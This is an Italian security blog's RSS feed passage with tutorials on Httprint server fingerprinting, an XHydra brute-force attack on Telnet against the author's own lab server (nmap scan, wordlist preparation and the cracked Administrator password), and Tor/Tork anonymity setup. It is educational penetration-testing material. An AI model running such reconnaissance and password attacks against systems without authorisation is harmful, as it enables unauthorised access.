La prima voce è <span style="text-decoration:underline;"><strong>Host</strong></span>: questa ci darà naturalmente <em><span style="text-decoration:underline;">google.com o apache.org</span></em>, in seguito abbiamo la <strong><span style="text-decoration:underline;">porta</span></strong> (se non la impostiamo nel nostro file di input manualmente quella di default rimarrà la 80), l&#8217;ultima voce sarà il tasso di affidabilità (<strong><span style="text-decoration:underline;">confidence rating</span></strong>), in questo momento ci indicherà 0 -zero- , perchè ancora non abbiamo iniziato la scansione.<br />
<span style="text-decoration:underline;"><em>Per iniziare dobbiamo schiacciare il tasto verde nella parte bassa della GUI</em></span>, ciò farà partire il processo di raccolta informazioni.<br />
Nota: Se hai selezionato bersagli multipli dovrai aspettare un bel pò , ma se vuoi interrompere il processo puoi sempre utilizzare il tasto <strong>stop</strong>.<br />
Una volta completato dovremmo vedere utilizzati i campi che prima erano vuoti e una finestra <em>popup</em> ci dovrebbe anche informare che il processo è terminato.</p>
<p style="text-align:left;"><span style="text-decoration:underline;">Ora dovremmo avere informazioni</span> molto importanti sul nostro bersaglio. Dovremmo avere informazioni sul banner ricevuto , e <span style="text-decoration:underline;">sul webserver che Httprint ritiene sia il più probabile</span> infine anche qualche info relative all&#8217;SSL (se utilizzato).</p>
<p style="text-align:center;">***</p>
<p style="text-align:left;">Iniziamo:<br />
<span style="text-decoration:underline;"><em>Settiamo l&#8217; input file</em></span>:      <strong><span style="color:#0000ff;">z:\pentest\enumeration\www\httprint_301\linux\input.txt</span></strong><br />
<span style="text-decoration:underline;"><em>signature file</em></span>:              <span style="color:#0000ff;"><strong>z:\pentest\enumeration\www\httprint_301\linux\signatures.txt</strong></span><br />
e ora il <em><strong>percorso in cui vogliamo salvare il nostro file di report</strong></em>:<br />
<strong><em><span style="color:#0000ff;">z:\root\Desktop\httprintoutput.html</span></em></strong><br />
io lo salvo sul desktop.</p>
<p style="text-align:center;"><strong>***</strong></p>
<p style="text-align:left;"><a href="http://carlitobrigante.files.wordpress.com/2008/09/snapshot5.png"><img class="aligncenter size-medium wp-image-637" title="snapshot5" src="http://carlitobrigante.files.wordpress.com/2008/09/snapshot5.png?w=300&#038;h=225" alt="" width="300" height="225" /></a></p>
<p style="text-align:center;"><strong>***</strong></p>
<p style="text-align:left;"><em><span style="text-decoration:underline;">Diamo l&#8217;avvio col tasto verde</span></em><br />
Ecco i risultati:<br />
<span style="color:#ff0000;"><strong><span style="text-decoration:underline;">Banner reported: Apache/2.2.9(Unix)<br />
Banner deduced:  Apache/2.0.x</span></strong></span><br />
con una <strong><em>confidence rating del del 78,31%</em></strong>, quindi abbastanza alta.<br />
<span style="text-decoration:underline;"><em>Dunque le informazioni ricevute direttamente dal server web ci dicono che esso è un Apache 2.2.9 mentre il nostro Httprint  in base al confronto fra le stringhe di testo ricevute e quelle presenti nel suo database ci dice che il server è un  Apache 2.0.x</em></span>. Risultato soddisfacente considerando l&#8217;alto tasso di confidence rating, l&#8217;unica divergenza è la versione che oscilla tra la 2.0 e la 2.2, cosa del tutto naturale considerando che quando si fa un fingerprinting è quasi impossibile avere la certezza matematica di ciò con cui si ha a che fare.<br />
Questo è il <strong><span style="text-decoration:underline;">report file</span></strong>:</p>
<p style="text-align:center;"><strong>***</strong></p>
<p style="text-align:left;"><a href="http://carlitobrigante.files.wordpress.com/2008/09/snapshot7.png"><img class="aligncenter size-medium wp-image-633" title="snapshot7" src="http://carlitobrigante.files.wordpress.com/2008/09/snapshot7.png?w=300&#038;h=225" alt="" width="300" height="225" /></a></p>
<p style="text-align:center;"><strong>***</strong></p>
<p style="text-align:left;">Ora facciamo una prova utilizzando un <span style="color:#000000;"><span style="text-decoration:underline;"><strong>file di output di nmap</strong></span></span>:<br />
Il comando di input che darò a nmap sarà il seguente:</p>
<p style="text-align:left;"><strong><span style="color:#0000ff;">#nmap www.google.com -p 80 -oX /root/aaa.xml</span></strong></p>
<p><em><span style="text-decoration:underline;">L&#8217; host che utilizzeremo sarà: <strong>www.google.com</strong> , la porta sarà la <strong>80</strong>, il file creato si chiamerà <strong>aaa.xml</strong> e la sua destinazione sarà nella cartella <strong>root/</strong></span></em></p>
<p style="text-align:center;"><strong>***</strong></p>
<p><em></em> <a href="http://carlitobrigante.files.wordpress.com/2008/09/snapshot8.png"><img class="aligncenter size-medium wp-image-634" title="snapshot8" src="http://carlitobrigante.files.wordpress.com/2008/09/snapshot8.png?w=300&#038;h=225" alt="" width="300" height="225" /></a></p>
<p style="text-align:center;"><strong>***</strong></p>
<p>Apriamo a questo punto <strong>Httprint_GUI </strong>e <em>selezioniamo &#8220;<strong>nmap</strong>&#8220;</em> nella parte dedicata all&#8217;input file, premiamo il tasto sfoglia e selezioniamo il file<strong> aaa.xml </strong>, infine col tasto &#8220;<strong>load</strong>&#8221; lo carichiamo.</p>
<p>L&#8217;unica cosa da fare a questo punto sarà <em><span style="text-decoration:underline;">premere il tasto verde di <strong>avvio</strong></span></em>.<br />
Una volta terminato possiamo constatare che , mettendo in correlazione la stringa catturata e quelle del nostro database, <span style="text-decoration:underline;"><strong>Httprint ipotizza che il web-server da noi analizzato possa essere un WebSitePro/2.3.18</strong></span> , con un tasso di affidabilità del <strong>39,76%</strong> , dunque non molto affidabile.</p>
<p>Solo al secondo posto troviamo come risultato gws , (google web server) , cioè l&#8217;informazione che abbiamo ottenuto direttamente dal server che stavamo analizzando (come si può vedere dalla foto in basso).</p>
<p>In questo caso credo che il secondo sia il risultato più accreditabile dato che tutti sanno che google.com utilizza web-server del tipo gws (web-server particolari per far fronte all&#8217;enorme traffico di cui è oggetto).</p>
<p style="text-align:center;"><strong>***</strong></p>
<p><a href="http://carlitobrigante.files.wordpress.com/2008/09/snapshot9.png"><img class="aligncenter size-medium wp-image-638" title="snapshot9" src="http://carlitobrigante.files.wordpress.com/2008/09/snapshot9.png?w=300&#038;h=225" alt="" width="300" height="225" /></a></p>
<p style="text-align:center;"><strong>***</strong></p>
<p><strong></strong> Possiamo aprire a questo punto il <em><strong>&#8220;Report File&#8221;</strong></em> che dovrebbe fornirci qualche info in più.<br />
Alla prossima.</p>
  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/carlitobrigante.wordpress.com/631/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/carlitobrigante.wordpress.com/631/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/carlitobrigante.wordpress.com/631/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/carlitobrigante.wordpress.com/631/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/carlitobrigante.wordpress.com/631/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/carlitobrigante.wordpress.com/631/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/carlitobrigante.wordpress.com/631/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/carlitobrigante.wordpress.com/631/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/carlitobrigante.wordpress.com/631/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/carlitobrigante.wordpress.com/631/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=carlitobrigante.wordpress.com&blog=1680906&post=631&subd=carlitobrigante&ref=&feed=1" /></div>]]></content:encoded>
			<wfw:commentRss>http://carlitobrigante.wordpress.com/2008/09/28/httprint-server-web-fingerprinting/feed/</wfw:commentRss>
		<slash:comments>14</slash:comments>
	
		<media:content url="" medium="image">
			<media:title type="html">redbar0n</media:title>
		</media:content>

		<media:content url="http://carlitobrigante.files.wordpress.com/2008/09/_httprint.gif" medium="image">
			<media:title type="html">_httprint</media:title>
		</media:content>

		<media:content url="http://carlitobrigante.files.wordpress.com/2008/09/snapshot5.png?w=300" medium="image">
			<media:title type="html">snapshot5</media:title>
		</media:content>

		<media:content url="http://carlitobrigante.files.wordpress.com/2008/09/snapshot7.png?w=300" medium="image">
			<media:title type="html">snapshot7</media:title>
		</media:content>

		<media:content url="http://carlitobrigante.files.wordpress.com/2008/09/snapshot8.png?w=300" medium="image">
			<media:title type="html">snapshot8</media:title>
		</media:content>

		<media:content url="http://carlitobrigante.files.wordpress.com/2008/09/snapshot9.png?w=300" medium="image">
			<media:title type="html">snapshot9</media:title>
		</media:content>
	</item>
		<item>
		<title>Hydra -2- Telnet Bruteforcing [+video]</title>
		<link>http://carlitobrigante.wordpress.com/2008/09/11/hydra-2-telnet-bruteforcing-video/</link>
		<comments>http://carlitobrigante.wordpress.com/2008/09/11/hydra-2-telnet-bruteforcing-video/#comments</comments>
		<pubDate>Thu, 11 Sep 2008 22:48:14 +0000</pubDate>
		<dc:creator>brigante~</dc:creator>
				<category><![CDATA[/Privilege Escalation]]></category>
		<category><![CDATA[Uncategorized]]></category>

		<guid isPermaLink="false">http://carlitobrigante.wordpress.com/?p=473</guid>
		<description><![CDATA[
***
Ciao a tutti,
quello che segue non è un vero e proprio tutorial , ma solo un&#8217; altro esempio d&#8217; utilizzo del tool per il login-bruteforcing Hydra.
Hydra , eccellente prodotto della THC-Freeworld , di cui abbiamo già parlato , offre la possibilità di fare bruteforcing su molti tipi di protocolli , quello di seguito è un [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=carlitobrigante.wordpress.com&blog=1680906&post=473&subd=carlitobrigante&ref=&feed=1" />]]></description>
			<content:encoded><![CDATA[<div class='snap_preview'><br /><p><a href="http://carlitobrigante.files.wordpress.com/2008/09/hydr2a.png"><img class="aligncenter size-full wp-image-610" title="hydr2a" src="http://carlitobrigante.files.wordpress.com/2008/09/hydr2a.png?w=240&#038;h=360" alt="" width="240" height="360" /></a></p>
<p style="text-align:center;"><strong>***</strong></p>
<p>Ciao a tutti,</p>
<p>quello che segue non è un vero e proprio tutorial , ma solo un&#8217; altro esempio d&#8217; utilizzo del tool per il login<em>-bruteforcing</em> <strong>Hydra</strong>.</p>
<p>Hydra , <em>eccellente prodotto della <a href="http://freeworld.thc.org/"><strong>THC-Freeworld</strong></a></em> , <a href="http://carlitobrigante.wordpress.com/2007/09/26/hacking-mail-account/"><em><span style="text-decoration:underline;">di cui abbiamo già parlato</span></em> </a>, offre la possibilità di fare bruteforcing su molti tipi di protocolli , quello di seguito è un semplice esempio fatto contro un <em>WindowsServer-2003.spk2</em> , (nella mia Lan) , tramite il protocollo <strong>Telnet</strong>.</p>
<p>Il tutorial precedente che trattava di Hydra è stato scritto mentre facevo delle prove sulla casella mail di un mio amico , quindi su protocollo <em><strong>pop3</strong></em> , utilizzando <strong>Hydra-gtk</strong> , l&#8217; attuale <strong>XHydra</strong> contenuto in <strong>BackTrack</strong> in&#8230;</p>
<p><strong>BackTrack</strong> &#8211;&gt; <strong>PrivilegeEscalation</strong> &#8211;&gt; <strong>PasswordAttack</strong> &#8211;&gt; <strong>PasswordOnLineAttack</strong> &#8211;&gt; <strong>&#8220;&#8230;&#8221;</strong></p>
<p>Appena aperto <strong>hydra-gtk</strong> si presenta con una <em>GUI</em> molto intuitiva , anche per i più ostici non è difficile comprenderne il funzionamento&#8230;</p>
<p style="text-align:center;"><strong>***</strong></p>
<p style="text-align:center;"><a href="http://carlitobrigante.files.wordpress.com/2007/09/hydra-wind-3.png"><img class="aligncenter size-full wp-image-33" src="http://carlitobrigante.files.wordpress.com/2007/09/hydra-wind-3.png?w=312&#038;h=315" alt="" width="312" height="315" /></a></p>
<p style="text-align:center;"><em>(Naturalmente la foto rappresenta solo un esempio dell&#8217; interfaccia&#8230;)</em></p>
<p style="text-align:center;"><strong>***</strong></p>
<p><em>Visto che di hydra abbiamo già parlato in passato , veniamo subito al nostro test , che faccio esclusivamente per poter mettere un video anche a riguardo di Hydra , inserito naturalmente nell&#8217; apposita pagina del <strong>blog</strong>.</em></p>
<p><span style="text-decoration:underline;"><em><strong>Seguendo il video&#8230;</strong></em></span></p>
<p>lanciando uno scanning con <strong>nmap</strong> contro il mio server , con opzioni di service fingerprinting , vediamo subito che la porta <strong>23</strong> del server , all&#8217; indirizzo <strong>29.230.6.73</strong> è aperta ed utilizzata per il servizio <strong>Telnet</strong> , solito sulla porta 23.</p>
<p>ecco infatti il risultato della scansione&#8230;</p>
<p>_______________________________________________</p>
<p><span style="color:#ff0000;"><strong>HaCkLaB</strong></span> <span style="color:#0000ff;">~ #</span> <strong>nmap -sV -T Aggressive 29.230.6.73</strong></p>
<p><span style="color:#ff0000;">Starting Nmap 4.68 ( http://nmap.org ) at 2008-09-10 13:44 GMT<br />
Interesting ports on 29.230.6.73:<br />
Not shown: 1710 filtered ports<br />
PORT     STATE SERVICE      VERSION<br />
<span style="color:#ff6600;"><strong>23/tcp   open  telnet       Microsoft Windows XP telnetd</strong></span><br />
135/tcp  open  msrpc        Microsoft Windows RPC<br />
139/tcp  open  netbios-ssn<br />
445/tcp  open  microsoft-ds Microsoft Windows 2003 microsoft-ds<br />
1027/tcp open  IIS?<br />
MAC Address: 00:02:72:61:7B:52 (CC&amp;C Technologies)<br />
Service Info: OSs: Windows XP, Windows</span></p>
<p><span style="color:#ff0000;">Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .<br />
Nmap done: 1 IP address (1 host up) scanned in 22.891 seconds</span></p>
<p>_______________________________________________</p>
<p>Ora per iniziare l&#8217; attacco basta crearci un file di testo che poi andremo ad utilizzare come <em>wordlist</em> per le nostre eventuali password&#8230;  &#8230;il file , con estensione <strong>*.txt</strong> , lo metteremo per comodità nel nostro <strong>Desktop</strong> , nel mio caso con il nome <strong>pwd.txt</strong>.</p>
<p>Per avere una wordlist decente ci sono molti mezzi , in passato abbiamo scritto riguardo a <a href="http://carlitobrigante.wordpress.com/2008/03/21/wyd-e-raccolta-wordlist/"><strong>wyd</strong></a> e alla raccolta di specifiche wordlist anche attraverso pagine HTML , ma volendo in <strong>BackTrack</strong> una <strong>wordlist</strong> <em>compressa</em> è già presente , in   <strong>/pentest/password/&#8230;.</strong> dal nome <strong>wordlist.txt.tar.gz</strong> , quindi basta andare a prenderla e modificarla con in testa al file le nostre eventuali password&#8230;</p>
<p>quidni:</p>
<p>_______________________________________________</p>
<p><span style="color:#ff0000;"><strong>HaCkLaB</strong></span> <span style="color:#0000ff;">~ # </span><strong>cd /<br />
</strong></p>
<p><span style="color:#ff0000;"><strong>HaCkLaB</strong></span> <span style="color:#0000ff;"><strong>/</strong> ~ # </span><strong>cd pentest/password/</strong></p>
<p><span style="color:#ff0000;"><strong>HaCkLaB</strong></span><span style="color:#3366ff;"> </span><strong><span style="color:#3366ff;">pentest/password/</span></strong><strong> </strong><span style="color:#0000ff;">~ # </span><strong>tar xvfz wordlist.txt.tar.gz</strong></p>
<p><strong>wordlist.txt</strong></p>
<p><span style="color:#ff0000;"><strong>HaCkLaB</strong></span> <strong><span style="color:#3366ff;">pentest/password/</span></strong> <span style="color:#0000ff;">~ # </span><strong>SciTE </strong><strong>wordlist.txt</strong><strong></strong></p>
<p>_______________________________________________</p>
<p>In questo modo potremo modificare la nostra wordlist con le stringhe che noi vogliamo tramite l&#8217; editor <strong>SciTE</strong> , anche se ovviamente potete farlo con l&#8217; editor che voi preferite.</p>
<p>Io per comodità , (visto che è solo un esempio pratico&#8230;) , ho messo la password <strong>komintern</strong> alla testa della lista , in questo modo sarà la prima ad essere provata e naturalmente a riuscire.</p>
<p>Bene , vista la scansione possiamo passare i risultati della stessa a <strong>XHydra</strong> , in questo modo possiamo lanciare l&#8217; attacco&#8230;</p>
<p>Come potete vedere dal video , appena compilati tutti i campi necessari Hydra inizia a fare i tentativi di login , secondo le impostazioni che noi abbiamo inserito , nel caso del video , ho inserito <strong>3 task </strong>con un timeout di <strong>59 secondi</strong>.</p>
<p>il risultato arriva presto&#8230;</p>
<p style="text-align:center;"><span style="text-decoration:underline;">***     user: <span style="color:#ff0000;"><strong>Administrator</strong></span> ***     password: <strong><span style="color:#ff0000;">komintern</span> ***</strong></span></p>
<p style="text-align:left;">Alla prossima&#8230;</p>
<img alt="" border="0" src="http://feeds.wordpress.com/1.0/categories/carlitobrigante.wordpress.com/473/" /> <img alt="" border="0" src="http://feeds.wordpress.com/1.0/tags/carlitobrigante.wordpress.com/473/" /> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/carlitobrigante.wordpress.com/473/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/carlitobrigante.wordpress.com/473/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/carlitobrigante.wordpress.com/473/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/carlitobrigante.wordpress.com/473/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/carlitobrigante.wordpress.com/473/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/carlitobrigante.wordpress.com/473/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/carlitobrigante.wordpress.com/473/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/carlitobrigante.wordpress.com/473/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/carlitobrigante.wordpress.com/473/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/carlitobrigante.wordpress.com/473/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=carlitobrigante.wordpress.com&blog=1680906&post=473&subd=carlitobrigante&ref=&feed=1" /></div>]]></content:encoded>
			<wfw:commentRss>http://carlitobrigante.wordpress.com/2008/09/11/hydra-2-telnet-bruteforcing-video/feed/</wfw:commentRss>
		<slash:comments>2</slash:comments>
	
		<media:content url="" medium="image">
			<media:title type="html">~br1g4nt3~</media:title>
		</media:content>

		<media:content url="http://carlitobrigante.files.wordpress.com/2008/09/hydr2a.png" medium="image">
			<media:title type="html">hydr2a</media:title>
		</media:content>

		<media:content url="http://carlitobrigante.files.wordpress.com/2007/09/hydra-wind-3.png" medium="image" />
	</item>
		<item>
		<title>Tork:   -Anonimato in BackTrack con un click-</title>
		<link>http://carlitobrigante.wordpress.com/2008/09/09/tork-anonimato-in-backtrack/</link>
		<comments>http://carlitobrigante.wordpress.com/2008/09/09/tork-anonimato-in-backtrack/#comments</comments>
		<pubDate>Tue, 09 Sep 2008 19:14:32 +0000</pubDate>
		<dc:creator>brigante~</dc:creator>
				<category><![CDATA[/Configure]]></category>
		<category><![CDATA[/General]]></category>

		<guid isPermaLink="false">http://carlitobrigante.wordpress.com/?p=558</guid>
		<description><![CDATA[
***
Ciao a tutti,
eccoci tornati a scrivere di un argomento che in molti mi hanno chiesto di provare , sto parlando dell&#8217; uso in BackTrack di software per l&#8217; anonimato in rete come TOR.
Tor è un progetto creato per rendersi anonimi durante lo scambio di informazioni in rete , dal chattare all&#8217; Istantaning Messaging fino alla [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=carlitobrigante.wordpress.com&blog=1680906&post=558&subd=carlitobrigante&ref=&feed=1" />]]></description>
			<content:encoded><![CDATA[<div class='snap_preview'><br /><p style="text-align:center;"><a href="http://carlitobrigante.files.wordpress.com/2008/09/anonym.png"><img class="aligncenter size-full wp-image-571" title="anonym" src="http://carlitobrigante.files.wordpress.com/2008/09/anonym.png?w=165&#038;h=163" alt="" width="165" height="163" /></a></p>
<p style="text-align:center;"><strong>***</strong></p>
<p>Ciao a tutti,</p>
<p>eccoci tornati a scrivere di un argomento che in molti mi hanno chiesto di provare , sto parlando dell&#8217; uso in <strong>BackTrack</strong> di software per l&#8217; anonimato in rete come <a title="TOR-Project" href="http://www.torproject.org/"><strong>TOR</strong></a>.</p>
<p>Tor è un progetto creato per rendersi anonimi durante lo scambio di informazioni in rete , dal chattare all&#8217; Istantaning Messaging fino alla semplice navigazione , usando appunto un circuito &#8220;indefinito&#8221; che porta lo stesso nome del software , Tor.</p>
<p>la nascita di Tor è avvenuta come reazione all&#8217; analisi del traffico che alcuni enti , seppur a volte con scopi comprensibili , eseguono venendo in possesso di informazioni riguardanti l&#8217; utenza in generale , informazioni che sono pursempre private e che ognuno dovrebbe poter scegliere se rivelare o meno.</p>
<p style="text-align:center;"><strong>***</strong></p>
<p><a href="http://carlitobrigante.files.wordpress.com/2008/09/top-left.png"><img class="aligncenter size-full wp-image-560" title="top-left" src="http://carlitobrigante.files.wordpress.com/2008/09/top-left.png?w=200&#038;h=81" alt="" width="200" height="81" /></a></p>
<p style="text-align:center;"><strong>***</strong></p>
<p>Per potersi anonimizzare durante la propria connessione in rete ci sono vari metodi come ad esempio , che sembra essere ancora il più usato , l&#8217; uso di proxy , più o meno fidati.</p>
<p>Un proxy viene da noi ritenuto fidato quando nasconde il nostro indirizzo IP , mettendoci quindi in condizioni di rimanere anonimi durante la navigazione o la connessione in generale , ma se in un modo o nell&#8217; altro si volesse risalire al nostro indirizzo IP ci basta far riferimento ai log I/O del proxy e si potrebbe risalire facilmente al momento e al nostro indirizzo di rete , per questo ci sono proxy fidati e meno , ma per evitare di correre rischi del genere la scelta del progetto Tor è quella che fà per noi.</p>
<p>La rete Tor è composta da normale <strong>utenza</strong> e <strong>nodi</strong> , nodi che sono costituiti da una parte dell&#8217; utenza stessa del progetto e che si scambiano informazioni  , cryptate e non , che fanno in modo che le connessioni da cui sono attraversati non abbiano una direzione specifica e che addirittura ripercorrano per più di una volta lo stesso nodo , in questo modo la rilevazione della connessione da parte di una specifica utenza risulta troppo difficile e l&#8217; anonimato è altamente affidabile.</p>
<p>Ora , pensiamo solo per un momento:   riuscire a risalire , anche in condizioni avvantaggiate di cui ad esempio alcuni enti possono godere , ad uno specifico indirizzo IP dal log di un proxy è possibile , in modo proporzionale all&#8217; affdabilità del proxy stesso ma pursempre possibile , per chi usa <strong>Tor</strong> però la cosa è totalmente diversa perché troppe sarebbero le informazioni di cui si dovrebbe venire in possesso e comunque sono informazioni che riguardano molti utenti e soprattutto privati&#8230;  &#8230;in pratica si dovrebbe invadere la privacy di troppi utenti e con un risultato tutt&#8217; altro che prevedibile.</p>
<p>Tor risulta quindi , (almeno per chi scrive) , la migliore strada per l&#8217; anonimato  e costituirsi come nodo , partecipando quindi ad un progetto come Tor è una cosa che con il passare del tempo diventerà semprepiù necessaria.</p>
<p>Per maggiori informazioni vi rimando nturalmente al sito ufficiale del progetto , che contiene informazioni &#8220;<span style="text-decoration:underline;">da leggere accuratamente</span>&#8221; prima di utilizzare <strong>Tor</strong> , ora veniamo allo scopo del tutorial , ovvero: rendersi anonimi con <strong>Tor</strong> in <strong>BackTrack</strong>.</p>
<p>BackTrack di prima installazione ci offre due web browser , Konqueror e Firefox , entrambe possono essere gestiti usando Tor , installando e configurando <span style="text-decoration:underline;"><a href="http://www.anonymityanywhere.com/tork/index.php"><strong>TORK</strong></a></span> , il progetto Tor impostato , facilitato ed arricchito per il Desktop Manager <strong>KDE</strong>.</p>
<p>La scelta dell&#8217; uso di <strong>Tork</strong> non è arrivata per la mancanza di risultati derivanti dall&#8217; uso di Tor senza l&#8217; ausilio di Tork , ma solo per fare in modo che in BackTrack , nel modo più veloce , comodo ed efficace , si riesca a rendersi anonimi per il numero più ampio di servizi possibile , essendo oltretutto una distro nata per l&#8217;uso in live con Tork ho notato una facilitazione di tutto il procedimento.</p>
<p><strong>Tork</strong> infatti , alla fine di tutte le procedure e configurazioni , (tutte molto semplificate tramite GUI) , riuscirà a farci ottenere l&#8217; anonimato per <strong>Konqueror</strong> , <strong>Firefox</strong> , <strong>Kopete</strong> , <strong>Pidgin</strong> , <strong>Konversation</strong> coprendo così la maggiorparte dei servizi possibili in rete da un <em>pc-desktop</em> , il tutto con un click sul <em>launcher</em> , per maggiore comodità e scelta anche di eventuali nostri proxy , installeremo<strong> <a href="http://www.privoxy.org/">Privoxy</a></strong> , che naturalmente dovremmo impostare per lavorare con Tor , (prima immagine dei due screenshot sotto) , in BackTrack basta inserire al primo avvio di Tork la path dell&#8217; installazione di Privoxy , di solito:</p>
<p><strong>/usr/local/sbin/privoxy</strong></p>
<p>Volendo ci si potrebbe avvalere anche di altri proxy , disabilitando Privoxy oppure senza installarlo , (secondo screenshot) , anche se lo consiglio con e senza Tor.</p>
<p>Privoxy è un gestore / proxy con la capacità di filtrare spam , controllare cookie e accesso in pagine web , rimuove pop-up e pubblicità&#8230;   &#8230;e lavora perfettamente con Tor.</p>
<p style="text-align:center;"><strong>***</strong></p>
<p><a href="http://img178.imageshack.us/my.php?image=weweqj6.png" target="_blank"><img src="http://img178.imageshack.us/img178/8416/weweqj6.th.png" border="0" alt="Free Image Hosting at www.ImageShack.us" width="202" height="180" /></a> <a href="http://img84.imageshack.us/my.php?image=wewe2og9.png" target="_blank"><img src="http://img84.imageshack.us/img84/2875/wewe2og9.th.png" border="0" alt="Free Image Hosting at www.ImageShack.us" width="203" height="181" /></a></p>
<p style="text-align:center;"><strong>***</strong></p>
<p>Tork ci offre la possibilità di renderci anonimi anche durante sessioni da <strong>shell</strong> , come ad esempio connessioni a server tramite protocolli <strong>Telnet</strong> e <strong>SSH</strong> , cosa che rende ancor più importante ed indispensabile avere <strong>Tork</strong> installato sul proprio sistema.</p>
<p>Veniamo ora alla procedura&#8230;</p>
<p>Innanzitutto dobbiamo installarci <strong>Tor</strong> e <strong>Privoxy</strong> , essendo già disponibili , <em>(e da me testati in <strong>BackTrack-3.final</strong> ma non in <strong>BackTrack-3.beta</strong>) </em>, i pacchetti della <strong>Slackware-12.0</strong> , ci basterà installare le versioni presenti nei <em><strong>repository</strong></em> , quindi con<em> <strong>slapt-get</strong></em>:</p>
<p><strong>slapt-get &#8211;search privoxy</strong></p>
<p><strong>slapt-get &#8211;install privoxy-*-*.tgz</strong></p>
<p><strong>slapt-get &#8211;search tor</strong></p>
<p><strong>slapt-get &#8211;install tor-*-*.tgz</strong></p>
<p><em>Non inserisco il numero delle versioni perché potrebbero variare secondo i repository&#8230;</em></p>
<p>A me l&#8217; installazione con slapt-get non ha rilevato la mancanza di nessuna dipendenza , naturalmente nel caso in cui serva si risolve.</p>
<p>Una volta installati Tor e Privoxy consiglio un reboot , per poi procedere con l&#8217; installazione sempre con slapt-get di Tork:</p>
<p><strong>slapt-get &#8211;search tork</strong></p>
<p><strong>slapt-get &#8211;install tork-*-*.tgz</strong></p>
<p style="text-align:center;"><strong>***</strong></p>
<p><a href="http://carlitobrigante.files.wordpress.com/2008/09/torklogo.png"><img class="aligncenter size-full wp-image-567" title="torklogo" src="http://carlitobrigante.files.wordpress.com/2008/09/torklogo.png?w=238&#038;h=61" alt="" width="238" height="61" /></a></p>
<p style="text-align:center;"><strong>***</strong></p>
<p style="text-align:left;">Una volta installatio <strong>Tork</strong> sarà presente nella sezione Internet con un <em>launcher</em> , che io ho messo per comodità nel pannello di KDE in modo da poter scegliere il servizio da avviare , anche singolarmente.</p>
<p style="text-align:left;">questa , solo per testimonianza , è uno snapshot fatto prima di attivare Tork , con <strong><span style="color:#ff0000;">FoxyProxy:Disabled</span> </strong> e l&#8217; icona di <strong>Tork verde</strong> , INATTIVO&#8230;</p>
<p style="text-align:center;"><strong>***</strong></p>
<p style="text-align:center;"><a href="http://www.postimage.org/image.php?v=aV17xmG0" target="_blank"><img class="aligncenter" src="http://www.postimage.org/aV17xmG0.jpg" border="0" alt="" /></a></p>
<p style="text-align:center;"><strong>***</strong></p>
<p style="text-align:left;"><em>L&#8217; IP è contraffatto , ma per il nostro scopo è più che sufficiente.</em></p>
<p style="text-align:left;">Appena installato Tork , all&#8217; apertura , presenta un&#8217; interfaccia grafica , con il simbolo &#8220;play&#8221; sul logo , appena premuto il <em><strong>play</strong></em> , ci verranno chieste le configurazioni , che ognuno può fare com meglio crede.</p>
<p style="text-align:left;">Io , visto che l&#8217; ho sempre usato del resto e mi ci sono sempre trovato benissimo , consiglio di installarsi i comodi Add-ons per <strong>Firefox</strong> , Tor-Button e FoxyProxy , in questo modo li avrete sempre sotto controllo e potrete attivarli/disattivarli all&#8217; occorrenza&#8230;    &#8230;quì <a href="https://addons.mozilla.org/en-US/firefox/addon/2464"><span style="text-decoration:underline;"><strong>FoxyProxy</strong></span></a> , (  impostato naturalmente all&#8217;avvio di Firefox per lavorare con Tor&#8230; ) ,e <a href="https://addons.mozilla.org/en-US/firefox/addon/2275"><span style="text-decoration:underline;"><strong>Tor-Button</strong></span></a>.</p>
<p style="text-align:left;">
<p style="text-align:left;"><span style="text-decoration:underline;"><em>iniziamo la nostra connessione aprendo Firefox tramite il launcher di Tork&#8230;</em></span></p>
<p style="text-align:center;"><strong>***</strong></p>
<p style="text-align:center;"><a href="http://www.postimage.org/image.php?v=Pq17_viA" target="_blank"><img class="aligncenter" src="http://www.postimage.org/Pq17_viA.jpg" border="0" alt="" /></a></p>
<p style="text-align:left;">
<p style="text-align:center;"><strong>***</strong></p>
<p style="text-align:left;"><span style="text-decoration:underline;"><em>&#8230;questa l&#8217; immagine de il mio IP con l&#8217; uso di Tor&#8230;</em></span></p>
<p style="text-align:center;"><strong>***</strong></p>
<p style="text-align:center;"><a href="http://www.postimage.org/image.php?v=aV17yFZJ" target="_blank"><img class="aligncenter" src="http://www.postimage.org/aV17yFZJ.jpg" border="0" alt="" /></a></p>
<p style="text-align:center;"><strong>***</strong></p>
<p style="text-align:left;">Potete notare che ho attivato sia <strong><span style="color:#00ff00;">FoxyProxy</span></strong> per lavorare con <strong>Tor</strong> e l&#8217; icona di Tork è Rossa , quindi Tork è <span style="text-decoration:underline;">ATTIVO</span>.</p>
<p style="text-align:left;">Come potete vedere  l&#8217; utilizzo di Tork ha cambiato inaspettatamente il mio tema di Firefox , ma a parte questo lieve cambiamento non ho notato alcun problema , anzi a dire il vero mi aspettavo una connessione in stile 56K , invece , anche se con una normalissima riduzione di velocità , ho raggiunto i miei soliti siti web con una velocità di tutto rispetto e con la copertura totale della mia privacy.</p>
